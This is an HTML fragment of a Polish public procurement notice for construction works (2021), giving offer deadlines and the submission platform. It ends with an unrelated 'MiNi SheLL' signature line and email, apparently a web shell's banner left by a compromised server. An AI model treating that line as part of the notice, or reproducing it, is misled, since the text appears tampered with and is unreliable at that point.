<h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa ZMSP https://zmsp.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-11 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com